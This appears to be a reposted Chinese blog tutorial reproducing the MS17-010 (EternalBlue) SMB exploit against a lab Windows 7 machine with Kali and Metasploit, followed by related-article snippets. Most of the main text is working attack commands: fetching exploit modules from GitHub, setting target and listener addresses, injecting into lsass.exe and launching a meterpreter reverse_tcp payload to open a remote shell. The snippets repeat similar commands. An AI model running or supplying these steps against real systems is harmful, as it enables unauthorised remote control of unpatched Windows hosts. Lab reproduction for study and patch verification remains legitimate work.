smb(ms17-010)远程命令执行之msf

最新推荐文章于 2025-07-16 11:14:10 发布
转载 最新推荐文章于 2025-07-16 11:14:10 发布 · 4.7k 阅读 · 1

本文介绍如何使用Kali Linux和Metasploit框架利用MS17-010漏洞攻击Windows 7系统。步骤包括安装必要的工具、配置Metasploit模块并成功获取Meterpreter会话。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32

 

 

用wine32执行cmd.exe

wine cmd.exe

 

exit        //退出

 

 git  clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

 

启动msf,然后进行一系列设置:

service postgresql start

msfconsole

 

 

search  eternalblue

use  exploit/windows/smb/eternalblue_doublepulsar

 

复制代码
 set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT   lsass.exe

set TARGETARCHITECTURE  x64

set rhost  192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit
复制代码

 

 

附录:

msf下的ms17-010模块:

前提条件:

1. gem install ruby_smb #ruby_smb模块安装

2.msfupdate   #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

 

复制代码
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

Meterpreter> sysinfo
复制代码

 

 

 

 

 

 

【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
李同學的安全圈
03-07 9224
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
msfMS17-010模块使用总结
whojoe的博客
06-20 1万+
msfMS17-010模块使用总结前言环境搭建漏洞无杀软情况有杀软情况参考文章 前言 在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。 环境搭建 这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机 kali 192.168.164.155 靶机1 192.168.164.156 靶机2 192.168.164.161(丢一个360的安装包进去,等会要用) 靶机2还要开启命名管道的匿名访问 打开cmd 执行g
ms17-010远程代码执行
m0_51407102的博客
06-13 689
远程代码执行①----ms-17-010漏洞演示 操作系统层面smb服务,远程代码执行(smb445端口,通过该漏洞得到目标shell) 操作,利用msf攻击得到shell 下面为演示 一.在kali中打开msf 前面就是msf5>就可以去输入msf的命令了 这里只做演示,所以直接选择攻击模块 set payload windows/x64/meterpreter/reverse_tcp 设置payload(注:还是注意靶机是多少位的,就选择多少位的)如下图所示 set lhost 192.1
Metasploit永恒之蓝(ms17_010
最新发布
m0_62908421的博客
07-16 826
MS17-010(永恒之蓝)是Windows SMBv1协议中的高危漏洞,允许远程代码执行,CVSS评分为10.0。漏洞源于SrvOs2FeaListSizeToNt函数的内存计算错误,攻击者通过构造畸形FEALIST数据包触发堆溢出,覆盖关键指针并注入内核级Shellcode。典型攻击链包含Grooming内存布局、溢出覆盖SRVNET_BUFFER_HDR结构、APC注入执行Payload等步骤,利用工具如Metasploit可实现自动化攻击。
利用MS17-010渗透win7(64位)
1stPeak's Blog
06-07 4814
这里是接着之前一篇"利用MS17-010渗透win7(32位)"的姊妹篇,想了解win7(32位)如何利用永恒之蓝渗透的请点击利用MS17-010渗透win7(32位) Win7x64的渗透,我们就可以不用下载利用模块了,kali里已经帮你集成好了 我这里的攻击机(192.168.1.222),靶机(192.168.1.111),记得靶机关闭防火墙 渗透流程 权限提升利用 渗透...
ms17_010的几种打法
Innocence_0的博客
08-15 1172
ms17_010是内网的必争之地,很多时候需要借助此漏洞来进行横向,由于多次遇到该漏洞时msf无法利用成功,就通过查阅资料来复现ms17_010的几种打法并在实战中成功。
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
MS17-010(永恒之蓝1.0)漏洞远程控制win7系统操作实战小白通俗易懂
qq_51627054的博客
02-06 879
6.根据刚刚查询的信息设置所需参数参数 ,现在是已经进入使用这个漏洞,required提示yes的地方需要设置对应参数。8.至此结束,写的不算是太详细,但是流程跟我上一篇类似,可以作为参考。1.准备环境win7操作系统(被攻击机)以及kali系统(攻击机),kali使用。2.打开kali终端,进入msf,输入msfconsole然后等待启动。5.查信息,使用info命令查看相关信息,查看如何使用这个脚本。4.搜索到这个漏洞,使用use命令,使用这个漏洞。3.搜索漏洞远程攻击MS17-010漏洞。
通过Metasploit实现MS17-010(永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1411
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
利用 MS17-010MSF 模块学习
震山的博客
08-30 725
利用 MS17-010MSF 的各个模块进行再次学习
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
Eternalblue-Doublepulsar-Metasploit:利用漏洞Eternalblue-Doublepulsar的Metasploit模块
05-02
永恒的蓝色-双脉冲星-元宝 本软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,侵权或其他形式的任何索赔,损害或其他责任,作者或版权所有者概不负责。软件。
利用MS17-010渗透win7(32位)
热门推荐
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
【NAS】Samba常用命令
渡江客涂鸦板
12-03 1万+
Samba常用命令
ms17-010 ms12-020 ms-08-067
qq_69100706的博客
06-27 736
攻击者可以利用此漏洞通过特制的Office文档或网页诱使用户打开,一旦用户打开了这些包含恶意内容的文件或访问了嵌入恶意控件的网页,就可以在受害者的系统上执行任意代码,从而完全控制受影响的系统。该漏洞的严重性在于其易于被利用且影响范围广,它被用于多起大规模的网络攻击事件中,最著名的例子就是2017年的WannaCry勒索软件疫情,该事件导致全球数十万台未打补丁的Windows计算机被感染,造成了巨大的经济损失和数据损失。因此,所有受影响的用户和组织都被强烈建议安装此安全补丁以保护自己的系统免受此类攻击。
[内网渗透]---msf基础-永恒之蓝-ms17-010
嘿嘿嘿
09-16 1336
用户可以访问和使用 Metasploit 提供的各种功能和模块,包括漏洞利用(exploits)、有效载荷(payloads)、辅助模块(auxiliary modules)、编码器(encoders)和后期利用(post-exploitation)模块等。Metasploit(通常简称为MSF)是一个开源的渗透测试框架,包含大量的已知漏洞利用模块,可以用来攻击目标系统并获取控制权。use 0 ----使用第一个利用漏洞机制进入该模块 --自动进入--
微软服务器更新通知,产品技术-微软安全公告 MS17-010 Microsoft Windows SMB 服务器安全更新 (4013389)-新华三集团-H3C...
weixin_39687422的博客
08-06 2047
1漏洞信息:此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。2漏洞描述符:CVE: CVE-2017-0143、 CVE-2017-0144、 CVE-2017-0145、 CVE-2017-0146、 CVE-2017-0147、 CVE-2017-0148、 C...
Windows下的MS17-010(永恒之蓝)漏洞分析与复现
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
msfms17-010
02-25
### 使用 Metasploit 执行 MS17-010 漏洞利用 #### 加载 EternalBlue Exploit 模块 为了针对 MS17-010 漏洞进行攻击或测试,在 Metasploit 中加载特定的 SMB 漏洞利用模块: ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue ``` 这一步骤选择了用于 Windows SMB 服务中的 MS17-010 漏洞——即著名的“永恒之蓝”漏洞的攻击向量[^1]。 #### 设置目标和配置 Payload 一旦选定模块之后,设置目标机器的相关参数以及选择有效负载(Payload),默认情况下会选择 `windows/x64/meterpreter/reverse_tcp` 这种反向 TCP Meterpreter shell 类型的有效荷载: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <local_ip> ``` 这里 `<target_ip>` 是指代存在潜在漏洞的目标主机 IP 地址,而 `<local_ip>` 则是指本地监听地址以便接收来自受害者的连接请求[^3]。 #### 验证并运行 Exploit 完成上述准备工作后,可以通过命令来检查当前设定是否合理,并最终执行实际攻击操作: ```bash msf6 exploit(windows/smb/ms17_010_etternalblue) > check msf6 exploit(windows/smb/ms17_010_eternalblue) > run ``` 需要注意的是,“check” 功能并非总是能够准确判断远程系统的脆弱性状态;因此即使返回不确定的结果也值得一试 “run”。 #### 后渗透阶段 如果成功突破,则会获得一个交互式的 Meterpreter Shell 或者其他形式的访问权限。此时可以根据具体需求进一步开展后续行动,比如文件系统浏览、密码提取等高级功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值